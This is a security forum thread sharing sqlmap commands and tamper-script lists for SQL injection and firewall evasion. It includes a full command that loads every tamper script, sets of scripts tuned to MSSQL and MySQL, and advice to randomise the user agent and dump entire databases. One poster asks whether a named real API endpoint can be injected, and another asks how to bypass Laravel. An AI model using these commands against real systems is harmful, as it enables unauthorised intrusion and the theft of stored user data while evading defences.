SQLMap Tamper Scripts (SQL Injection and WAF bypass)

Starter Zone
1

Hey All,

You all prob know about SQLmap’s ability to load tamper script rules to evade filters and WAF’s but what I didn’t know until a few months back was that you can use all of them in one line like so:

sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

These are some targeted tamper sets by DBMS type, good to have handy when testing;

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Let’s just ignore the fact that you are sending a million requests though :wink:

6 Likes
2

Also just to give credit where credit is due, some of this was written up on a blog somewhere but I cant find it for the life of me…

More references on SQLMap Tamper Scripts:

3 Likes
3

Sorry for my language i m italian boy Good tutorial but for example if error is "ADODB.Recordset error ‘800a0e78’

Operation is not allowed when the object is closed.

/ricerca.asp, line 337
I can use it right ?

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
or you raccomanded one tamper specific ?

4

Tamper scripts post updated to reflect recent changes.

http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html

J.

5

The domain is expired

1 Like
6

They have updated sqlmap.

What I use for mySql enumeration and DB hacking is:

-(minus minus-tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

If you have any issues make sure your setting these values:

–level 3
–risk 3
–flush-session
–random-agent ← this is almost critical from my exp.

Remember, always try to point sqlmap to a specific GET parameter with ‘-p <paramname’
for instance if url Example Domain
sqlmap -p item

One additional thing that has helped me, add -a at the end, so it dumps anything it finds in the DB

dj substance

7

I want to know if I can have SQL INJECTION IN THIS FORM

image
image918×158 14.2 KB

curl 'https://api.infinitylearn.com/api/users/3024371
–compressed

8

Which the best --tamper script in SQLMAP to bypass Laravel ?